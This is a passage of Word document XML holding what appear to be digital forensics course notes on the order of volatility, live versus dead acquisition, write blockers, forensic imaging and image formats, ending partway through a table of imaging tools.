              <w:ind w:left="1773" w:right="1773"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">6. Disk (files, registry, logs on disk) — survives shutdown</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The widely used reference document </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">RFC 3227</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (“Guidelines for Evidence Collection and Archiving”) gives a more detailed list, from most to least volatile:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CPU registers and cache</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Routing table, ARP cache, process table, kernel statistics, and memory (RAM)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Temporary file systems</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Disk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote logging and monitoring data relevant to the system</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Physical configuration and network topology</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Archival media (backup tapes, optical discs)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="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Exam tip</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Whichever list you write, show the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">idea</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">: RAM and network state first → processes and users → disk → backups and archives last. Give one line on why (data disappears at power-off).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.3 Live vs Dead Acquisition</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The choice between the two depends on the state of the target system and what evidence is needed.</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Live acquisition</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Dead acquisition</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What it is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is collected while the system is </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">powered on and running</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is collected from a system that is </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">powered off</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">; the disk is removed or the system is booted from a forensic OS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Captures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RAM, running processes, network connections, logged-in users, encrypted volumes that are currently unlocked</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Full disk contents as stored, including deleted data</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Advantages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Preserves volatile evidence; can capture encryption keys and unlocked data; useful for servers that cannot be shut down</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Safer for the original; repeatable; write blocker can be used; no running malware to interfere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Disadvantages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Every command changes the system; malware or a rootkit may hide data; harder to repeat</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All volatile evidence is lost; an encrypted disk becomes unreadable without the key</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Use when</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 is on and volatile data matters (malware, intrusion, encryption)</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 is already off, or evidence is mainly stored data</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Live acquisition in a famous case</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">When the US FBI arrested the founder of the Silk Road marketplace in a public library in 2013, agents made sure his laptop was captured </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">while it was open and logged in</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">. A running, unlocked laptop can reveal admin sessions and chat windows, and an encrypted drive can become unreadable once it is shut down. This is a standard reason for live acquisition.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="6A3D9A" w:sz="6"/>
          <w:left w:val="single" w:color="6A3D9A" w:sz="6"/>
          <w:bottom w:val="single" w:color="6A3D9A" w:sz="6"/>
          <w:right w:val="single" w:color="6A3D9A" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="F3ECF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="6A3D9A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">↔ Commonly confused</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Live acquisition</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live analysis on the original</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">. Even in live acquisition you copy the data (for example RAM) to an external drive and analyse the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">copy</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> later. The aim is to touch the running system as little as possible.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.4 Write Blockers</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write blocker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a device or software that lets the investigator </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">read</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from a storage device but </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">blocks every command that would write</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to it. The suspect drive is connected through the write blocker, so that the forensic workstation cannot accidentally change it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">■ Where a write blocker sits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11"/>
        <w:gridCol w:w="300"/>
        <w:gridCol w:w="2211"/>
        <w:gridCol w:w="300"/>
        <w:gridCol w:w="2211"/>
        <w:gridCol w:w="300"/>
        <w:gridCol w:w="2211"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2211"/>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Suspect drive (original evidence)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2211"/>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Write blocker</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2211"/>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Forensic workstation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2211"/>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Forensic image (copy)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Why are write blockers essential?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">When an operating system sees a new disk, it automatically does things in the background: it may update last-access times, write a journal entry, create hidden system folders (like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">System Volume Information</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), or start indexing. Windows may also “fix” a disk that it thinks is dirty. All of these are </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">writes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and they permanently change the original evidence — which can destroy the proof that the original is unaltered and damage the chain of custody.</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What if you boot from the suspect USB drive?</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">The operating system on the drive starts and writes to it: logs, temp files, registry changes, and the last-boot time. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Timestamps of many files change</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> and new data may overwrite the unallocated space where deleted files were hiding. The evidence is contaminated and the defence lawyer can claim that anything found may have been created by the investigator. This is why the original drive must never be booted or mounted normally before imaging.</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Hardware write blocker</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Software write blocker</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What it is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physical box placed between the drive and the computer (e.g. Tableau, WiebeTech); blocks write commands at the interface level</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program or system setting that makes the operating system treat the device as read-only (e.g. Windows registry write-protect setting, forensic Linux that mounts read-only)</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Reliability</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Highest — independent of the operating system</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Depends on correct configuration and the OS; more chance of error</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Cost / convenience</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Costs money and must be carried to the site</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Free or cheap, portable, easy to use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Typical use</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Standard method in labs and for court cases</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When hardware blockers are not available, or for USB devices in the field</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Remember</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Always </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">test the write blocker</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> with a non-evidence drive before using it, and note the model and firmware version in your documentation. A blocker that fails silently is worse than none.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.5 Forensic Imaging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The bit-stream copy concept</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bit-stream (bit-by-bit) copy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, also called a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">forensic image</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, is an exact copy of every bit of the storage device — not only the visible files, but also deleted files, unallocated space, slack space, boot sectors and partition tables. A normal copy-paste copies only the files you can see; a forensic image copies everything, including areas that can hold hidden or deleted evidence.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Normal file copy</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Forensic (bit-stream) image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Copies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Only visible, allocated files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Every sector — files, deleted data, slack, unallocated space, partition table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Metadata</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Timestamps of copies change</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Original structure and timestamps preserved inside the image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Verifiable</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Yes — with hash values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 in court</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Weak</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Standard accepted method</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Investigators never analyse the original disk. They create a verified image, put the original into secure storage, and analyse the image (or a copy of it). If something goes wrong, the image can be recreated from the original or from a backup of the image.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Image formats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Format</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RAW / dd (.dd, .img, .001)</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plain sector-by-sector copy. Simple and readable by all tools, but large (same size as the source), with no built-in metadata or compression.</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E01 (EnCase / Expert Witness)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Very common format. Supports compression, stores case details (case number, examiner, notes) and includes built-in hashes and checksums for integrity. Can be split into segments (.E01, .E02…).</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AFF</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Open-source advanced forensic format with compression and metadata.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Imaging tools overview</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1949"/>
        <w:gridCol w:w="5360"/>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w:t>
            </w:r>
          </w:p>
        </w:tc>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Platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="53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FTK Imager</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Windows (free)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="536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Creates RAW, E01 and other images; previews evidence without changing it; calculates MD5/SHA-1; can capture RAM; produces a verification report. The main tool of your lab practicals.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dd</w:t>
            </w:r>
          </w:p>
        </w:tc>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Linux / Unix (built-in)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="536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Command-line tool that copies raw data block by block. Variants </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">dc3dd</w:t>
